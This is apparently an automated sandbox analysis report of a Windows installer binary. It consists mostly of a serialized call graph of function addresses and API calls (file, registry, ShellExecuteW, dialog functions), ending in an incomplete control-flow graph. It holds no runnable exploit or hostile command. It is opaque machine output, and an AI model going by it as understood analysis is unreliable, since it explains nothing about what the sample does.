3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                        Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 